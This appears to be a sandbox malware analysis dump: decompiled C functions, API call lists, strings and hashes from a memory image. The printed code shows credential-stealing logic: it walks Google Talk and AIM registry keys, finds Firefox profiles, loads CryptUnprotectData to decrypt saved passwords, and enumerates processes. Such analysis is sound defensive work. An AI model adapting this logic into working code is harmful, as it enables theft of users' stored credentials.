                                          				if( *0x41e010 == 0) {
                                          					L7:
                                          					return 0;
                                          				}
                                          				memcpy( &_v556, 0x41df00, 0x10c);
                                          				if( *0x41e010 == 0) {
                                          					goto L7;
                                          				}
                                          				_t33 = _v556;
                                          				if(_t33 == 0) {
                                          					goto L7;
                                          				}
                                          				return _t33;
                                          			}





















                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: DirectorySystem_mbscpymemcpymemset
                                          • String ID: hA$lsass.exe
                                          • API String ID: 3651535325-1783533361
                                          • Opcode ID: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
                                          • Instruction ID: 0e5f66d5a96f37e034b058b5e8cd5d15c838e509caf2427c45d960fa31638fa3
                                          • Opcode Fuzzy Hash: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
                                          • Instruction Fuzzy Hash: 23213671C04298B9EB10DBB9EC057CEBF789B04308F0484BAD644A7191C7B98B88C7A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 0040FC6B
                                          • memset.MSVCRT ref: 0040FC82
                                            • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                            • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                          • _mbscat.MSVCRT ref: 0040FCAD
                                            • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                            • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                            • Part of subcall function 0041223F: _mbscpy.MSVCRT ref: 0041230C
                                          • _mbscat.MSVCRT ref: 0040FCD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                          • API String ID: 3071782539-1174173950
                                          • Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                          • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
                                          • Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                          • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • RegCloseKey.KERNELBASE(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
                                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
                                          • _mbscat.MSVCRT ref: 00412188
                                            • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                          Strings
                                          • ProgramFilesDir, xrefs: 00412150
                                          • :\Program Files, xrefs: 0041217E
                                          • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseDirectoryOpenQueryValueWindows_mbscat
                                          • String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                          • API String ID: 3464146404-1099425022
                                          • Opcode ID: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                          • Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
                                          • Opcode Fuzzy Hash: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                          • Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E004085B9(void* __ecx, void* __eflags, int _a4) {
                                          				char _v8;
                                          				long _v4112;
                                          				void* __esi;
                                          				intOrPtr* _t42;
                                          				intOrPtr* _t43;
                                          				char* _t46;
                                          				int _t52;
                                          				void* _t54;
                                          				void* _t73;
                                          				intOrPtr _t75;
                                          				int _t78;
                                          				struct HINSTANCE__** _t79;
                                          				void* _t81;
                                          
                                          				0x414060();
                                          				_t73 = __ecx;
                                          				E0040733E(__ecx + 4);
                                          				_t78 = _a4;
                                          				if(_t78 == 0) {
                                          					L3:
                                          					E0040821A(_t85, _t73); // executed
                                          					_t79 = _t73 + 0x78;
                                          					E00404D18(_t79);
                                          					_t42 =  *((intOrPtr*)(_t79 + 4));
                                          					if(_t42 == 0) {
                                          						_t43 = 0;
                                          						__eflags = 0;
                                          					} else {
                                          						_t43 =  *_t42( &_v8, 0, 0, 1, 0xf0000000); // executed
                                          					}
                                          					if(_t43 == 0) {
                                          						L14:
                                          						return _t43;
                                          					} else {
                                          						_a4 = 0;
                                          						if( *((intOrPtr*)(_t73 + 0x20)) <= 0) {
                                          							L12:
                                          							_t75 = _v8;
                                          							E00404D18(_t79);
                                          							_t43 =  *((intOrPtr*)(_t79 + 8));
                                          							if(_t43 != 0) {
                                          								_t43 =  *_t43(_t75, 0);
                                          							}
                                          							goto L14;
                                          						} else {
                                          							goto L8;
                                          						}
                                          						do {
                                          							L8:
                                          							_t46 = E00407455(_a4, _t73 + 4);
                                          							_v4112 = 0;
                                          							MultiByteToWideChar(0, 0, _t46, 0xffffffff,  &_v4112, 0x800);
                                          							0x413df8( &_v4112);
                                          							E00408490(_t73, _v8,  &_v4112); // executed
                                          							_t52 = wcslen( &_v4112);
                                          							if(_t52 > 0) {
                                          								_t54 = _t52 + _t52;
                                          								if( *((short*)(_t81 + _t54 - 0x100e)) != 0x2f) {
                                          									 *((short*)(_t81 + _t54 - 0x100c)) = 0x2f;
                                          									 *((short*)(_t81 + _t54 - 0x100a)) = 0;
                                          									E00408490(_t73, _v8,  &_v4112);
                                          								}
                                          							}
                                          							_a4 = _a4 + 1;
                                          						} while (_a4 <  *((intOrPtr*)(_t73 + 0x20)));
                                          						goto L12;
                                          					}
                                          				}
                                          				_a4 = 0;
                                          				if( *((intOrPtr*)(_t78 + 0x1c)) <= 0) {
                                          					goto L3;
                                          				} else {
                                          					goto L2;
                                          				}
                                          				do {
                                          					L2:
                                          					E00407407(_t73 + 4, E00407455(_a4, _t78));
                                          					_a4 = _a4 + 1;
                                          					_t85 = _a4 -  *((intOrPtr*)(_t78 + 0x1c));
                                          				} while (_a4 <  *((intOrPtr*)(_t78 + 0x1c)));
                                          				goto L3;
                                          			}

















                                          APIs
                                            • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
                                            • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800), ref: 00408661
                                          • _wcslwr.MSVCRT ref: 0040866E
                                          • wcslen.MSVCRT ref: 0040868B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$ByteCharMultiWide_wcslwrwcslen
                                          • String ID: /$/
                                          • API String ID: 2365529402-2523464752
                                          • Opcode ID: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                          • Instruction ID: 2a8444091b22e9eb4757945b889b84cf8c338ceadb4b858a9340bcb8d8787785
                                          • Opcode Fuzzy Hash: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                          • Instruction Fuzzy Hash: 5131A271500109EBDB11EF95CD819EEB3A8BF04345F10857EF585B3280DB78AE858BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00407F7E(signed int _a4) {
                                          				void* _v12;
                                          				int _v16;
                                          				void* _v20;
                                          				void _v279;
                                          				char _v280;
                                          				void _v4375;
                                          				int _v4376;
                                          				long _t26;
                                          				char* _t29;
                                          				int _t31;
                                          				void* _t39;
                                          				void* _t44;
                                          				void* _t48;
                                          				void* _t49;
                                          				void* _t50;
                                          				void* _t51;
                                          
                                          				0x414060();
                                          				E00407C79(_a4); // executed
                                          				_t26 =  &_v12;
                                          				0x411d68(0x80000001, "Software\Google\Google Talk\Accounts", _t26, _t44, _t39);
                                          				_t49 = _t48 + 0xc;
                                          				if(_t26 == 0) {
                                          					_v16 = 0;
                                          					_v280 = 0;
                                          					memset( &_v279, 0, 0xff);
                                          					_t50 = _t49 + 0xc;
                                          					_t29 =  &_v280;
                                          					0x411dee(_v12, 0, _t29);
                                          					while(1) {
                                          						_t51 = _t50 + 0xc;
                                          						if(_t29 != 0) {
                                          							break;
                                          						}
                                          						_t31 =  &_v280;
                                          						0x411d68(_v12, _t31,  &_v20);
                                          						_t50 = _t51 + 0xc;
                                          						if(_t31 == 0) {
                                          							_v4376 = _t31;
                                          							memset( &_v4375, _t31, 0xfff);
                                          							_t50 = _t50 + 0xc;
                                          							0x411d82(_v20, 0x418304);
                                          							E00407E33(_a4,  &_v280,  &_v4376);
                                          							RegCloseKey(_v20);
                                          						}
                                          						_v16 = _v16 + 1;
                                          						_t29 =  &_v280;
                                          						0x411dee(_v12, _v16, _t29);
                                          					}
                                          					_t26 = RegCloseKey(_v12);
                                          				}
                                          				return _t26;
                                          			}




















                                          APIs
                                            • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CDB
                                            • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CEF
                                            • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D09
                                            • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D1E
                                            • Part of subcall function 00407C79: GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                            • Part of subcall function 00407C79: GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                            • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                            • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                            • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407D91
                                            • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407DA0
                                            • Part of subcall function 00407C79: memcpy.MSVCRT ref: 00407DB2
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 00407FCC
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • memset.MSVCRT ref: 00408019
                                          • RegCloseKey.ADVAPI32(000000FF,?,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 00408050
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000FF), ref: 00408075
                                          Strings
                                          • Software\Google\Google Talk\Accounts, xrefs: 00407F99
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                          • String ID: Software\Google\Google Talk\Accounts
                                          • API String ID: 2959138223-1079885057
                                          • Opcode ID: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
                                          • Instruction ID: d1f993f4292481421df56ff24d775a8bf39926e587c7cc16b4fa812e835a0406
                                          • Opcode Fuzzy Hash: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
                                          • Instruction Fuzzy Hash: CC2131B1D0511DBADF21AB95DD42EEEBB7CAF04744F0000B6FA08B1151E7355B94CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E0040C427(void* __eax, intOrPtr* __ebx) {
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t19;
                                          				void* _t20;
                                          				void* _t21;
                                          				struct HICON__* _t23;
                                          				intOrPtr* _t30;
                                          				void* _t32;
                                          				intOrPtr* _t35;
                                          
                                          				_t30 = __ebx;
                                          				 *((intOrPtr*)(__ebx + 0x140)) = 0;
                                          				 *__ebx = 0x418778;
                                          				 *((intOrPtr*)(__ebx + 0x388)) = 0;
                                          				 *((intOrPtr*)(__ebx + 0x394)) = 0;
                                          				0x413d5c(0x738);
                                          				if(__eax == 0) {
                                          					_t19 = 0;
                                          					__eflags = 0;
                                          				} else {
                                          					_t19 = E0040D339(__eax);
                                          					 *0x41e15c = _t19;
                                          				}
                                          				 *((intOrPtr*)(_t30 + 0x38c)) = _t19;
                                          				0x413d5c(); // executed
                                          				_t35 = _t19;
                                          				_t40 = _t35;
                                          				_t32 = 0x8fc;
                                          				if(_t35 == 0) {
                                          					_t35 = 0;
                                          					__eflags = 0;
                                          				} else {
                                          					E004092CC(_t35, _t40);
                                          					_t5 = _t35 + 0x1cc; // 0x1cc
                                          					_t6 = _t5 + 8; // 0x1d4
                                          					 *_t35 = 0x417eb8;
                                          					E0040D339(_t6);
                                          					 *_t5 = 0x417f40;
                                          					 *(_t35 + 0x1c8) =  *(_t35 + 0x1c8) | 0xffffffff;
                                          				}
                                          				 *((intOrPtr*)(_t30 + 0x390)) = _t35;
                                          				_t20 =  *(_t30 + 0x388);
                                          				if(_t20 != 0) {
                                          					DeleteObject(_t20);
                                          					 *(_t30 + 0x388) = 0;
                                          				}
                                          				_t21 = E00406AE0(); // executed
                                          				 *(_t30 + 0x388) = _t21;
                                          				E00401000(_t32, _t30 + 0x285, 0x418678);
                                          				 *((intOrPtr*)(_t30 + 0x174)) = 0;
                                          				 *((intOrPtr*)(_t30 + 0x17c)) = 0;
                                          				 *((intOrPtr*)(_t30 + 0x178)) = 0;
                                          				 *((intOrPtr*)(_t30 + 0x170)) = 0;
                                          				_t23 = LoadIconA( *0x41dbd4, 0x65); // executed
                                          				E00402C8F(_t30, _t23);
                                          				return _t30;
                                          			}













                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$DeleteIconLoadObject
                                          • String ID: ;@
                                          • API String ID: 1986663749-2925476404
                                          • Opcode ID: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
                                          • Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
                                          • Opcode Fuzzy Hash: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
                                          • Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00412192: LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
                                            • Part of subcall function 00412192: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                          • memset.MSVCRT ref: 00412297
                                          • RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                          • _mbscpy.MSVCRT ref: 0041230C
                                            • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122B2, 004122C2
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                          • API String ID: 889583718-2036018995
                                          • Opcode ID: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                          • Instruction ID: 8ee396e5f1da91aaa9319efae8cdfa2544b6f7efa6ef91eb3d4b19fa56f42788
                                          • Opcode Fuzzy Hash: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                          • Instruction Fuzzy Hash: 7011DB71800215BBDB24A6985D4A9EE77BCDB05304F1000EBED51F2152D6B89EE4C69E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404C9D(struct HINSTANCE__** __eax, void* __eflags) {
                                          				void* __esi;
                                          				struct HINSTANCE__* _t7;
                                          				_Unknown_base(*)()* _t10;
                                          				struct HINSTANCE__** _t11;
                                          
                                          				_t11 = __eax;
                                          				E00404CE0(__eax);
                                          				_t7 = LoadLibraryA("crypt32.dll"); // executed
                                          				 *_t11 = _t7;
                                          				if(_t7 != 0) {
                                          					_t10 = GetProcAddress(_t7, "CryptUnprotectData");
                                          					_t11[2] = _t10;
                                          					if(_t10 != 0) {
                                          						_t11[1] = 1;
                                          					}
                                          				}
                                          				if(_t11[1] == 0) {
                                          					E00404CE0(_t11);
                                          				}
                                          				return _t11[1];
                                          			}








                                          APIs
                                            • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                          • LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                          • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID: CryptUnprotectData$crypt32.dll
                                          • API String ID: 145871493-1827663648
                                          • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                          • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
                                          • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                          • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 004115A1
                                          • K32EnumProcesses.KERNEL32(?,00004000,004044A3,?,004044A3,?,00000000,00000000,00000000), ref: 004115B9
                                            • Part of subcall function 004112D9: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
                                            • Part of subcall function 004112D9: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
                                            • Part of subcall function 004112D9: K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
                                            • Part of subcall function 004112D9: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
                                            • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
                                            • Part of subcall function 0041172B: memcpy.MSVCRT ref: 00411758
                                          • _mbscpy.MSVCRT ref: 0041165E
                                          • CloseHandle.KERNEL32(00000000,004044A3,?), ref: 00411697
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseEnumProcess_mbscpy$ChangeFileFindHandleModuleModulesNameNotificationOpenProcessesmemcpymemset
                                          • String ID:
                                          • API String ID: 3551507631-0
                                          • Opcode ID: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
                                          • Instruction ID: 5e40a2ef1ff72a785ccc601064cd9551f1045985186162b7752f8c4c90acf24d
                                          • Opcode Fuzzy Hash: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
                                          • Instruction Fuzzy Hash: 72317271901129ABDB20EB65DC85BEE77BCEB44344F0440ABE709E2160D7759EC5CA68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00411CB8
                                            • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                            • Part of subcall function 00406F2D: memcpy.MSVCRT ref: 00406F78
                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                          • memset.MSVCRT ref: 00411CF4
                                          • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                          • String ID:
                                          • API String ID: 3143880245-0
                                          • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                          • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
                                          • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                          • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E00404220(void* __eflags, intOrPtr _a4, void* _a8) {
                                          				signed int _v8;
                                          				void* __ecx;
                                          				void* __esi;
                                          				void* _t17;
                                          				void* _t18;
                                          				void* _t19;
                                          				signed int _t20;
                                          				void* _t24;
                                          				void* _t27;
                                          				long _t31;
                                          				void* _t34;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_t34 = E004067BA(_a8);
                                          				_a8 = _t34;
                                          				if(_t34 != 0xffffffff) {
                                          					_t31 = GetFileSize(_t34, 0);
                                          					_t5 = _t31 - 0x11; // -17
                                          					if(_t5 <= 0xfffee) {
                                          						_t6 = _t31 + 1; // 0x1
                                          						_t17 = _t6;
                                          						0x413d5c(); // executed
                                          						_t27 = _t17;
                                          						_t24 = _t17;
                                          						_t18 = E00406ED6(_t27, 0, _t34, _t24, _t31); // executed
                                          						if(_t18 != 0) {
                                          							_t19 = E00406B3B();
                                          							_t43 = _t19;
                                          							if(_t19 == 0) {
                                          								_push(_t31);
                                          								_push(_t24);
                                          							} else {
                                          								_push(_t31 + 0xfffffff4);
                                          								_t7 = _t24 + 0xc; // 0xc
                                          							}
                                          							_push(_a4);
                                          							_t20 = E004049E6(_t43); // executed
                                          							_v8 = _t20;
                                          						}
                                          						0x413d56(_t24);
                                          					}
                                          					CloseHandle(_a8);
                                          				}
                                          				return _v8;
                                          			}















                                          APIs
                                            • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00404241
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00404257
                                            • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404291
                                          • CloseHandle.KERNEL32(?), ref: 0040429A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$??2@??3@CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 1968906679-0
                                          • Opcode ID: f8c6986dee829a369a6d7fc671dad0cd2f3c2bf524c5f015633fded4cebe1fc5
                                          • Instruction ID: a1f592bc07a1c6bae19e5ae82b96cf667b255c71c14e9b40cb31a6e8a4c88875
                                          • Opcode Fuzzy Hash: f8c6986dee829a369a6d7fc671dad0cd2f3c2bf524c5f015633fded4cebe1fc5
                                          • Instruction Fuzzy Hash: F801A1B2501118BBD710AA65EC45EDF776CEB853B4F10823EFD15E62D0EB389E0086A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
                                          • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
                                          • K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Process$ChangeCloseEnumFileFindModuleModulesNameNotificationOpen
                                          • String ID:
                                          • API String ID: 1149579341-0
                                          • Opcode ID: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
                                          • Instruction ID: d3b8bc427d879abbe067d139e4d8751d61c0b56586969d320d8ec49f77c75a5b
                                          • Opcode Fuzzy Hash: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
                                          • Instruction Fuzzy Hash: 0A01DF36200109BFFB105FA29D84AEBBBACEB44784B04003AFF12D05A0D779DC81822D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
                                          • Instruction ID: 5397eece0a1688dd905253f83ef07836dc4e260be7ec153caf65aeba5f13d1a3
                                          • Opcode Fuzzy Hash: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
                                          • Instruction Fuzzy Hash: 82E04674308210269A24AF3BFE49AC723AC5B54725794852FF808D33A2CE2CCCC0802C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
                                          • Instruction ID: 62cae8e83bd5d1efe0b7207de595a3d8a96caeb03304a295a8faf49e2a024305
                                          • Opcode Fuzzy Hash: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
                                          • Instruction Fuzzy Hash: 58F04FB96012005EFB589F36ED4679576F0A708309F18C53EE9058B2F4EB7444448F1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040D935(intOrPtr* _a4) {
                                          				long _v8;
                                          				long _v12;
                                          				char _v273;
                                          				void _v275;
                                          				char _v276;
                                          				void* _t21;
                                          				void* _t22;
                                          
                                          				_v8 = 0;
                                          				_v276 = 0;
                                          				memset( &_v275, 0, 0x104);
                                          				GetWindowsDirectoryA( &_v276, 0x104);
                                          				_v273 = 0;
                                          				GetVolumeInformationA( &_v276, 0, 0,  &_v8,  &_v12, 0, 0, 0); // executed
                                          				_t21 = E0040D794(_a4, 0x80000002, _v8); // executed
                                          				if(_t21 != 0) {
                                          					_t22 = E0040D794(_a4, 0x80000001, _v8); // executed
                                          					return _t22;
                                          				}
                                          				return _t21;
                                          			}











                                          APIs
                                          • memset.MSVCRT ref: 0040D959
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
                                          • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
                                            • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
                                            • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                            • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                            • Part of subcall function 0040D794: atoi.MSVCRT ref: 0040D840
                                            • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
                                            • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8B3
                                            • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8C6
                                            • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
                                          • String ID:
                                          • API String ID: 2578913611-0
                                          • Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                          • Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
